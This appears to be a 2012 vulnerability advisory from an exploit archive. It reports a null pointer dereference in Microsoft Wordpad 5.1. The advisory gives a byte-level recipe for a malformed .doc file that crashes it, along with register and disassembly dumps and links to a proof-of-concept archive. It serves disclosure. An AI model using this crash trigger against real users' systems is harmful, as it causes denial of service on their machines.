Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Exploit

Summary

Microsoft Wordpad 5.1 (.doc) suffers from null pointer dereference vulnerability.

Credit:

The information has been provided by condis.


Details

Vulnerable Systems:
 * Microsoft Wordpad 5.1

Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability

Tested on Windows XP SP 3 Proffesional PL
MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)

This isn’t bug from CWE 2009-0259

$ Binnary diff of template file (proper empty doc document) and malformed file
(showing just the offset that differs):

0000 1200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 — template file
0000 1200: 00 00 00 00 00 00 63 6F 6E 64 00 00 00 00 00 00 — proof of concept

Actually it doesn’t matters (almost) what 4 bytes we will put there untill they != 0x00.

Access violation when reading [00000004]

$ Registers:

eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608
esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8
ebp = 0177f5cc

$ Function dump :

01b9dbb4 55 push ebp
01b9dbb5 8bec mov ebp,esp
01b9dbb7 56 push esi
01b9dbb8 8b7508 mov esi,dword ptr [ebp+8]
01b9dbbb 807e0400 cmp byte ptr [esi+4],0 ds:0023:00000004=?? ; —- crash
01b9dbbf 751b jne mswrd8+0x1dbdc (01b9dbdc)
01b9dbc1 8b06 mov eax,dword ptr [esi]
01b9dbc3 57 push edi
01b9dbc4 8b78fc mov edi,dword ptr [eax-4]
01b9dbc7 57 push edi
01b9dbc8 ff156010b801 call dword ptr [mswrd8+0x1060 (01b81060)]
01b9dbce 57 push edi
01b9dbcf ff157410b801 call dword ptr [mswrd8+0x1074 (01b81074)]
01b9dbd5 56 push esi
01b9dbd6 e87bfdffff call mswrd8+0x1d956 (01b9d956)
01b9dbdb 5f pop edi
01b9dbdc 5e pop esi
01b9dbdd 5d pop ebp

$ ‘O, hai’ goes to Echo, Varseand, cxecurity and madcow ;3

$ Below You should see link to attachement with PoC:

http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
http://www.exploit-db.com/sploits/18952.rar

Disclosure Timeline:
Published: 2012-05-30

Categories: Exploits